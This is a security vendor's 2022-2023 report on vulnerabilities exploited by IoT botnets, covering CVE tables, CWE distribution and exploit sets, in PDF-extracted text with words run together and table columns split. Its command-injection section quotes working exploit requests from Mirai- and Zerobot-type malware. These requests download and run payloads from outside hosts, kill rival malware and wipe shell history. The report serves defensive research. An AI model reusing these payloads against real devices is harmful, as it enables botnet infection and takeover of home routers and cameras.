THE2022-2023IOTBOTNETREPORT

VULNERABILITIES

TARGETED

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

2Copyright?2023CUJOLLC

Introduction

ThisreportinvestigatestheIoTbotnetactivitywe'veobservedin

consumernetworksprotectedbyCUJOAI

fromearlyJuly2022totheendofJanuary2023.Formoreinsightsintoourresearch,visittheCUJOA

Ibloga

ndthe

ISPsecurityhub.

MostInternetofThings(IoT)deviceshavelimitedresources,Unix-likeoperatingsystemsandinadequatecybersecuritymeasures.Thelatter,combinedwiththeoftenshortandneglectedsoftwaresupportcyclesfromdevicemanufacturers,provideasigni?cantbreedinggroundforcybercriminals,whoarekeentotakeadvantageofthesituation.

TableofContents

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

3Copyright?2023CUJOLLC

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

TableofContents

Introduction2

loTThreats4

WhatAreWeCallingaBotnet?5

HowBotnetsWork5

PreviousBotnetReport5

The2022-2023loTBotnetReport:Summary6

ListofExploitedVulnerabilities7

VulnerabilityTypeDistributionbyCWE14

It'sAllAboutCommandInjection14

Speci?cVulnerabilitiesTargeted19

Top10VulnerabilitiesExploitedin2021vs2022/202320

NewExploitedVulnerabilities23

VulnerabilityDistributionbyDisclosureYear:NewvsOldExploits25

SetsofExploits27

HowCUJOAIProtectsInternetUsersAgainstBotnets29

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

IoTThreats

OurlatestannualcybersecurityreportshowsthatwhileIPcamerasmakeuponly1.2%ofalldevicesmonitoredandprotectedbyCUJOAI,theyaretargetedby24%ofallmaliciousactivities.Thefollowingpopularmanufacturers’devicesaretargetedbythemostthreatsonaverage:

Seagate(NASproducts)

SpecoTechnologies(CCTV,DVRproducts)

QNAP(NASproducts)

Hikvision(IPCamera,DVRproducts)

TheInternetofThings(IoT)landscapeconsistsofbillionsofdevicesconnectedtotheInternet,andvariousforecastssuggestthattheirnumberwillonlygrowinthecomingyears.

IoTdevices

comeinmanydifferentforms:smarthomeappliances,printers,IPcameras,routers,varioussensors,andthelistgoeson.Fromamoretechnicalpointofview,anydevicewithanIPaddress,whichisnotmanagedlikeatypicaldesktopcom-puter,laptop,orsmartphonecanbeconsideredanIoTdevice.

4Copyright?2023CUJOLLC

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

5Copyright?2023CUJOLLC

WhatAreWeCallingaBotnet?

Sincewe’llbediscussingbotnet-relatedthreats,weshouldstartwithade?nitionofwhatabotnetis.Abotnetisanetworkofdevicesinfectedbyspeci?cmalware,wheredevicescanbecontrolledbytheoperatorofthemalware.Thisspeci?ctypeofmalwareisalsoreferredtoasa"botnet",whichisthemean-ingweareusingherefromnowon.

HowBotnetsWork

Theanatomyofatypicalbotnet-relatedattackonIoTdeviceshasn’tchangedmuchinthepastcoupleof

loadsandstartsexecutingthemalwarebinaries.ThebinarynamesgenerallyincludetheCPUarchitecture

years,andwehavedetaileditinaprevious

article.

Inshort,itinvolvesastagershellscript,whichdown-

theyarecompiledfor.MostofthemalwareobservedintheIoTlandscapearevariantsoftheinfamous

MiraiorGafgyt

botnets,butmalwarewritteninGoisontherisetoo,with

Sysrv

and

Zerobot

asprime

examplesofthis.

Twoofthemainvectorsforthespreadofbotnetsare:

1.Brute-forcingweaklogincredentials

2.Exploitingknownsoftwarevulnerabilities

Ingeneral,the?rstoneisthemorecommonmethod,asnotedinourpreviousreport:“poorqualityIoTdevicesoftencomewithhard-coded,defaultpasswordsthatarenotchangedbytheuseror,whenapasswordchangeisenforced,changedtoaneasytoremember(andthereforequicklybrute-forceable)password”.Theproblemremainsprevalenttoday.

PreviousBotnetReport

Our

previousreport

covereda4-monthperiodin2021andfoundthatonly8%ofthesamplescontained

exploits.Ofthose,83%usedtwoormorevulnerabilityexploits.Intotal,wehadfound20differentvulnera-

bilitiesbeingtargeted,withmostofthemdisclosedin2018orearlier.

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

6Copyright?2023CUJOLLC

The2022-2023IoTBotnetReport:

Summary

BetweenearlyJuly2022andtheendofJanuary2023,6,471differentELFbinarieswereclassi?edasmaliciousand1,685(26%)containedatleast1exploitofavulnerability,whichisamajorincreasefrom8%in2021.Intotal,55vulnerabilitiesarebeingexploited,morethantwiceasmanyasin2021.

Bylookingatthe

CommonWeaknessEnumerations(

CWEs),acommunity-developedlistofhardwareandsoftwarevulnerabilitytypesassignedtothevulnerabilities,we'veobservedsomevariationfromthe100%"Injection"typevulnerabilitieswe'dseenearlier.However,evenwhentheCWEcategoryistechnicallydifferent,thegoalofthemalwareisalmostalwaysthesame:toremotelyruncommandsonthetargetedsystem.TheonerealoutlierisCVE-2021-4034,whichenableslocalprivilegeescalation.

Therearethreenewentriesamongthetop10mostexploitedvulnerabilities.However,CVE-2017-17215isbyfarthemostfrequentlyseenexploitinmalware:itisusedby1,625outof1,685exploit-containingbinaries.Ofthemorefrequentlyseennewlyexploitedvulnerabilities,allaretiedtotheZerobotbotnet,buttwoarealsoexploitedbyothermalware.

Thedistributionofvulnerabilitiesbytheiryearofdisclosureshowssomemajorshiftscomparedtoourlastreport,asmorerecent(disclosedwithintwoyearspriortothisreport)vulnerabilitiesarerepresent-edinmuchgreaternumbers,althoughfewmalwarebinariesexploitthem.

Fewermalwarebinariesusetwoormoreexploits–40%in2022-23versus83%in2021.Intotal,36differentexploitsetsareobservedandZerobotequipsthelargestexploitsetwith22entries.

Only6outof36exploitsetsdiscoveredduringourresearchincludeexploitsforrecentlydisclosed(withintwoyearspriortothisreport)vulnerabilities.Fourofthesesetsaremadeupofaround50%ormoreexploitstargetingrecentvulnerabilities.Wehaveexplicitlynamedandlistedthesefoursetsalongwiththeirmalware,sincetheyarethemostinnovateintermsofexploitingfreshvulnerabilities.

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

ListofExploitedVulnerabilities

Thisisalistofalltheexploitedvulnerabilitieswe'vedetectedbetweenearlyJuly2022andtheendofJanuary2023.TheVulnerabilityTypecolumnisbasedontheCommonWeaknessEnumeration(CWE).Wearealsolistingtheaffecteddeviceorsoftwaretypeswithspeci?cmodelsorversionnames.

CVE

Vulnerabilityname

Vulnerabilitytype(CWE)

Affecteddevice/-softwaretype

CVE-2007-3010

-

-

CVE-2013-7471

-

CVE-2014-2321

AlcatelOmniPCXUni?edMaintenanceTool"masterCGI"Unauthenticated

RemoteCommandExecu-

tionvia'user'parameter

Netgear"setup.cgi"

UnauthenticatedRemoteCommandExecution

ZTEZXV10H108L

"manager_dev_ping_t.gch"

RemoteCommandExecu-

tion

D-LinkUPnP"soap.cgi"

UnauthenticatedRemoteCommandExecution

Linksys"tmUnblock.cgi"

UnauthenticatedRemoteCommandExecution

ZTECableModem

"web_shell_cmd.gch"

UnauthenticatedRemoteCommandExecution

ImproperInput

Validation

CommandInjection

CommandInjection

CommandInjection

CommandInjection

CommandInjection

(disagrees)

Software(Uni?edMainte-nanceToolinAlcatelOmniPCXEnterpriseCommunicationServer)

Router(NetgearDGN1000,DGN2000)

Router(ZTEZXV10H108L)

Router(D-LinkDIR-300,DIR-600,DIR-645,DIR-845,DIR-865)

Router(LinksysE-series)

Modem(ZTEF460,F660)

7Copyright?2023CUJOLLC

8Copyright?2023CUJOLLC

CVE

Vulnerabilityname

Vulnerabilitytype(CWE)

Affecteddevice/-softwaretype

CVE-2014-3206

CVE-2014-8361

CVE-2014-9118

CVE-2015-2051

-

-

-

CVE-2016-6277

SeagateBlackArmorNAS"localJob.php"

UnauthenticatedRemoteCommandExecution

RealtekSDK-miniigdUPnPSOAP"

wanipcn.xml"/"pics-

desc.xml"

UnauthenticatedCom-

mandExecution

DASANZhone"zhn-ping.cmd"Authenticated

RemoteCommandExecu-

tionvia'ipAddr'parameter

UnauthenticatedRemote

CommandExecutionviathe"GetDeviceSettings"actiontotheHNAPinter-face

AVTECHRemoteCommand

Executionvia"Search.cgi"(unauthenticated),"CloudSetup.cgi"(authenticated)or"adcom-mand.cgi"(authenticated)pages

VACRONNVR"board.cgi"

RemoteCommandExecu-

tionvia'cmd'parameter

CCTV/DVR

"language/Swedish"RemoteCommandExecution

Netgear"cgi-bin/;"Unau-thenticatedRemoteCom-mandExecution

ImproperInputValidation

ImproperInputValidation

CommandInjection

CommandInjection

CommandInjection

CommandInjection

CommandInjection

CommandInjection

(disagrees)

NAS(SeagateBlackArmorNAS110,220)

Software(RealtekSDK),Router(multipleproductsinD-LinkDIR-series)

Router(DASANZhonezNIDGPON2426A)

Router(D-LinkDIR-645)

IPcamera,NVR,DVR

(AVTECH)

NVR(VACRON)

DVR,CCTV(morethan70vendors)

Router(multipleproductsinNetgearR-seriesandD-series)

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

9Copyright?2023CUJOLLC

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

CVE

Vulnerabilityname

Vulnerabilitytype(CWE)

Affecteddevice/-softwaretype

CVE-2016-10372

CVE-2016-20016

CVE-2016-20017

CVE-2017-5638

CVE-2017-17215

CVE-2017-18368

CVE-2017-18377

CVE-2018-10561/10562

ZyXEL/eirD1000"UD/act?"UnauthenticatedRemoteCommandExecution

JAWSwebserver"/shell"

UnauthenticatedRemoteCommandExecution

D-Link"login.cgi"Unauthen-ticatedRemoteCommandExecutionvia'cli'parameter

ApacheStruts2Unauthenti-catedRemoteCommandExecutionviaOGNLInjec-tion

HuaweiHG532"DeviceUp-grade_1"Authenticated

RemoteCommandExecu-

tion

Zyxel"ViewLog.asp"router

UnauthenticatedRemote

CommandExecutionvia'remote_host'parameter

WIFICAMIPcamera"set_ftp.cgi"Unauthenticat-edRemoteCommand

Execution

DasanGPONRouters

"GponForm/diag_Form"AuthenticationBypassandCommandInjectionvulner-abilitiesvia'dest_host'parameter

CommandInjection

CommandInjection

CommandInjection

ImproperInputValidation

ImproperInputValidation

CommandInjection

CommandInjection

ImproperAuthenticationandCommandInjection

Modem(ZyXEL/eirD1000)

DVR(MVPowerTV-7104HE,TV-7108HE.)

Router(D-LinkDSL-2750B)

Software(ApacheStruts2)

Router(HuaweiHG532)

Router(ZyxelP660HN)

IPcamera(WIFICAM)

Router(DasanGPON)

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

CVE

Vulnerabilityname

Vulnerabilitytype(CWE)

Affecteddevice/-softwaretype

CVE-2018-10823

CVE-2018-17173

CVE-2018-20057

CVE-2018-20062

CVE-2020-7209

CVE-2020-8515

CVE-2020-8958

CVE-2020-9054

D-Link"chkisg.htm"AutheticatedRemoteCommandExecutionvia'Sip'parame-ter

LGSuperSignCMS"getThumbnail"Unauthenti-catedRemoteCommandExecutionvia'sourceUri'parameter

D-Link"formSysCmd"

AuthenticatedRemote

CommandExecutionvia'sysCmd'parameter

NoneCMSv1.3ThinkPHP

"index.php"Unauthenticat-edRemoteCommandExecutionvia'invokefunc-tion'parameter

LinuxKIUnauthenticated

RemoteCommandExecu-

tion

DrayTekVigor2960"main-function.cgi"Unauthenticat-edRemoteCommandExecutionvia'keyPath'parameter

OptiLinkGPON"formP-ing"/"formTracert"Authenti-catedRemoteCommandExecutionvia'target_addr'parameter

ZyXELNAS-series"weblog-in.cgi"Unauthenticated

RemoteCommandExecu-

tionvia'username'parame-

CommandInjection

CommandInjection

CommandInjection

ImproperInputValidation

CommandInjection

CommandInjection

CommandInjection

CommandInjection

Router(multipleD-LinkDWR-series)

Software(LGSuperSign)

Router(D-LinkDIR-619L,DIR-605L,SapidoRB-1732)

Software(NoneCMSv1.3,ThinkPHP)

Software(LinuxKI)

Firewall(DrayTek

Vigor2960)

Router(Guangzhou1GEONUV2801RW,V2804WRandOptiLinkONT1GEW)

NAS(multipleproductsinZyXELNAS-series)

10Copyright?2023CUJOLLC

ter

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

CVE

CVE-2020-10173

CVE-2020-10987

CVE-2020-17456

CVE-2020-25506

-

CVE-2021-4034

CVE-2021-4039

CVE-2021-35394

CVE-2021-35395

11

Vulnerabilityname

Vulnerabilitytype(CWE)

Affecteddevice/-softwaretype

MultipleAuthenticatedCommandInjectionvulnerabilitiesinComtrendVR-3033routersvia"ping.cgi"pageand'pingIpAddress'parameter

Tenda"setUsbUnload"

UnauthenticatedRemote

CommandExecutionvia'deviceName'parameter

Seowon"system_log.cgi"

UnauthenticatedRemote

CommandExecutionvia'ipAddr'parameter

D-Link"system_mgr.cgi"

UnauthenticatedRemoteCommandExecution

PHP8.1.0-devBackdoor

RemoteCommandExecu-

tion

Localprivilegeescalationvulnerabilityinpolkit'spkexecutility

ZyXEL"login.html"Unau-thenticatedRemoteCom-mandExecutionvia'myname'parameter

RealtekJungleSDK"orf;"

UnauthenticatedRemoteCommandExecution

RealtekJungleSDKUnau-thenticatedCommandInjectionvulnerabilitiesin"formSysCmd"and"form-Wsc"pages

CommandInjection

CommandInjection

CommandInjection

CommandInjection

CommandInjection

Out-of-bounds

Read/Write

CommandInjection

CommandInjectionandOut-of-boundsWrite

CommandInjectionandOut-of-boundsWrite

Router(Comtrend

VR-3033)

Router(TendaAC15,

AC1900)

Router(SeowonIntechSLC-130,SLR-120S)

Router(D-LinkDNS-320)

Software(PHP8.1.0-dev)

Software(polkitpkexecutility)

Router(ZyXEL

NWA-1100-NH)

Software(RealtekJungleSDK)

Software(RealtekJungleSDK)

Copyright?2023CUJOLLC

CVE

Vulnerabilityname

Vulnerabilitytype(CWE)

Affecteddevice/-softwaretype

CVE-2021-36260

CVE-2021-41773

CVE-2021-42013

CVE-2021-44228

CVE-2021-46422

-

CVE-2022-1388

CVE-2022-22947

CVE-2022-22965

Hikvisionwebserver

"SDK/webLanguage"

UnauthenticatedRemoteCommandExecution

ApachewebserverUnau-thenticatedPathTraversal

ApachewebserverUnau-thenticatedPathTraversalNo.2afteranincomplete?xforCVE-2021-41773

ApacheLog4jUnauthenti-catedCommandExecution

Telesquare"admin.cgi"

UnauthenticatedRemote

CommandExecutionvia'Cmd'parameter

AdobeColdFusion11

UnauthenticatedJNDI

attackvia'verifyldapserver'method

F5BIG-IPAuthentication

Bypassin"mgmt/t-

m/util/bash"pagevia'run'commandand'utilCm-dArgs'parameter

SpringCloudGatewayUnauthenticatedCom-

mandInjection

"Spring4Shell"Unauthenti-catedCommandInjection

CommandInjection

PathTraversal

PathTraversal

ExpressionLanguage

Injection

CommandInjection

Deserializationof

UntrustedData

MissingAuthenticationforCriticalFunction

CommandInjection

CommandInjection

IPcamera(multipleproductsinHikvisionDS-2CDseries)

Software(ApacheHTTPserver)

Software(ApacheHTTPserver)

Software(ApacheLog4j)

Router(Telesquare

SDT-CW3B1)

Software(AdobeColdFu-sion)

Firewall(F5BIG-IP)

Software(SpringCloudGateway)

Software(SpringMVC/SpringWebFlux)

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

12Copyright?2023CUJOLLC

13Copyright?2023CUJOLLC

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

CVE

Vulnerabilityname

Vulnerabilitytype(CWE)

Affecteddevice/-softwaretype

CVE-2022-25075

CVE-2022-26186

CVE-2022-26210

CVE-2022-29013

CVE-2022-30525

CVE-2022-34538

CVE-2022-37061

TOTOLINK"downloadFli-

le.cgi"Unauthenticated

RemoteCommandExecu-

tionvia'payload'parameter

TOTOLINK"cstecgi.cgi"

UnauthenticatedRemote

CommandExecutionvia'exportOvpn'interfaceand'command'parameter

TOTOLINK"cstecgi.cgi"

UnauthenticatedRemote

CommandExecutionvia'setUpgradeFW'functionand'FileName'parameter

RazerSilaUnauthenticated

RemoteCommandExecu-

tionin"ubus"pageby'call'methodand'command'parameter

ZyXEL?rewallUnauthenti-catedRemoteCommandExecutionvia"setWanPort-St"commandand'mtu'parameter

DigitalWatchdog

"addacph.cgi"

AuthenticatedRemote

CommandExecutionviamultipleparameters

FLIR"res.php"Unauthenti-catedRemoteCommandExecutionvia"alarm"actionand'id'parameter

CommandInjection

CommandInjection

CommandInjection

CommandInjection

CommandInjection

CommandInjection

CommandInjection

Router(TOTOLINKA

3000RU)

Router(TOTOLINK

N600R)

Router(multipleproductsinTOTOLINKA-series)

Router(RazerSila)

Firewall(multipleprod-uctsinZyXELUSGFLEX-series)

IPcamera(DigitalWatch-dogDWMEGApix)

Thermalsensorcamera(FLIRAX8)

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

14Copyright?2023CUJOLLC

VulnerabilityTypeDistributionbyCWE

Here’showthevulnerabilitytypesaredistributedbasedontheCWElist:

VulnerabilitytypedistributionbyCWE

CommandInjection

ImproperInputValidation

Out-of-boundsWrite

PathTraversal

MissingAuthenticationforCriticalFunction

DeserializationofUntrustedData

ExpressionLanguageInjection

Out-of-boundsRead

ImproperAuthentication

0

5

1015202530354045

It'sAllAboutCommandInjection

MostofthevulnerabilitiesmapontotheInjectioncategoryintheOWASP'sTop10WebApplicationSecu-rityRisks

list,

where'Injection’includesCommandInjection,ImproperInputValidationandExpressionLanguageInjection.Thisisnotsurprising,sincethecasewassimilarinourlastreport.

Exploitingthistypeofvulnerabilityismostoftenquitesimple,asitrequiresonlyoneorafewspeciallycraftedandparameterizedHTTPrequeststhatalreadycontainthecommandstobeexecutedonthetargetedsystem.Thesecommands–the'exploitcode'–oftendownloadandexecuteastagerscriptorthemaliciousbinariesthemselves.Anotherfactorthatcontributestothelowattackcomplexityformostofthevulnerabilitiesweobservedisthatevenanunauthenticatedusercanexecuteafullyworkingexploit.

ThereareninevulnerabilitiesthathaveCWEsoutsideoftheInjectioncategory,likeOut-of-boundsRead/WriteorPathTraversal.Thesearedescribedinmoredetailbelow,however,whatevertheirCWEsaretechnically,thethreatactorcanachievecommandinjectionbyexploitingeightofthem.

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

CVE-2018-10561and10562arealwaysexploitedtogether.The?rstonehastheImproperAuthenticationCWE,whichstatesthatonecanbypassauthenticationbyappending"?images"toanyURLthatrequiresauthenticationoncertainDasanGPONrouters.CVE-2018-10562saysthatthediag_Formpagewiththedest_hostformparametercanrunarbitrarycommandsonthesystem.Thus,thefollowingexploitisborn.

ExploitforCVE-2018-10561/10562takenfrom[2]

POST/GponForm/diag_Form?images/HTTP/1.1

Host:127.0.0.1:8080

Connection:keep-alive

Accept-Encoding:gzip,deflate

Accept:*/*

User-Agent:Hello,World

Content-Length:118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+34/ohshit.sh+

-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0

CVE-2021-4034istheonerealoutlierbecauseitenableslocalprivilegeescalation,i.e.,itallowstheattackertoruncommandsasrootonanalreadyinfectedsystem,andisalsoamemorycorruptionvulnera-bilityinitsnature.Thevulnerablesoftwareispolkit'spkexecutility,whichcanbefoundoneverymajorLinuxdistributionbydefault.Itinvolvesthereintroductionof"unsecure"environmentvariablestopkexec'senvironment,suchas"GCONV_PATH".Thesevariablesenabletheattackertorunarbitrarycommandsasroot,whichare?rstcompiledintoasharedlibrary?le.ThefollowingscreenshotsshowtheuseofGCON-V_PATHandmain.write_gconv_module(),whichisresponsibleforthesharedlibrary?le.Youcan?ndmoredetailaboutthevulnerabilit

yhere.

IndicatorsforaCVE-2021-4034exploittakenfrom[9]

15Copyright?2023CUJOLLC

16Copyright?2023CUJOLLC

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

CVE-2021-35394and35395describevulnerabilitiesintheRealtekJungleSDK,whichisapackageofbina-riessuppliedwithspeci?cRealtekSoCs(systems-on-chip)usedbymultipleroutermanufacturers.TheexploitforCVE-2021-35394isalittledifferentfromotherexploitstargetingCommandInjectionvulnerabili-ties,sinceitdoesnotuseanHTTPrequest,butratheraspeci?callyformedUDPpacketsenttoarouter'sport9034onaLANIPaddress.

orf;cd/tmp;rm-rfmpsl;cd/tmp;/bin/busyboxwget

88/mipsel&&chmod+xmipsel&&./mipsel

CVE-2021-35395,ontheotherhand,usesanormalHTTPrequestsentto/goform/formWsc,wheretheformdata'speerPinparametercontainstheexploitcommands.Thisvulnerabilitycanalsobeexploitedwithanotherpage,called"formSysCmd"anditsformdataparametersysCmd.The'goform'partcorre-spondstotheGo-Aheadwebserver,usedasabasefortheroutermanagementwebinterface.TherealsoareBoawebserver-basedimplementations,whichwouldtranslateto'boafrm'inthepagepath.

ExploitforCVE-2021-35395takenfrom[5]

POST/goform/formWsc

User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)

AppleWebKit/537.36(KHTML,likeGecko)Chrome/107.0.0.0Safari/537.36Content-Type:application/x-www-form-urlencoded

Accept:*/*

Connection:close

submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;wget

http://zero.sudolite.ml/zero.sh

||curl-o

http://zero.sudolite.ml/zero.sh

||curl-O

http://zero.sudolite.ml/zero.sh

;killalli.imozi.mMozi.mmozi.aMozi.akaitenNbruteminerd/bin/busybox;history-c;rm~/.bash_history;chmod755zero.sh;/bin/bash

zero.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=

AtleasttwootherCVEs(CVE-2018-20057andCVE-2019-19824)canbetracedbacktoCVE-2021-35395sincetheydescribeproduct-speci?cvulnerabilitiesforthesamewebpagesandformparameters,althoughthecoreproblemliesintheRealtekJungleSDK,whichisusedintheproductswiththesevulnera-bilities.ThisissueisdescribedindetailinOnekey's

blogpost.

CVE-2021-41773andCVE-2021-42013belongtothePathTraversalCWE.BothimpacttheApacheHTTPwebserver,andCVE-2021-42013existsbecausethe?xforCVE-2021-41773wasincomplete.TheexampleexploitsfromtheZerobotmalware([5])actinthesameway:startbashandexecutethecommandsintheformdatasection,wherethepartmarkedinredisessentialandisbase64encodedintheactualrequests.ItshouldbenotedthatintheZerobotbinarytherelevantGomethodthatimplementstheseexploitsiscalledCVE-2018-12613,whichisacompletelydifferentvulnerabilitynotexploitedbyZerobot.

17Copyright?2023CUJOLLC

The2022-2023IoTBotnetReport–VulnerabilitiesTargeted

ExploitsforCVE-2021-41773andCVE-2021-42013takenfrom[5]

wgethttp://zero.sudolite.ml/zero.sh||curl-o

http://zero.sudolite.ml/zero.sh

||curl-O

http://zero.sudolite.ml/zero.sh

;killalli.imozi.mMozi.mmozi.aMozi.akaitenNbruteminerd/bin/busybox;history-c;rm~/.bash_history;chmod755zero.sh;/bin/bashzero.s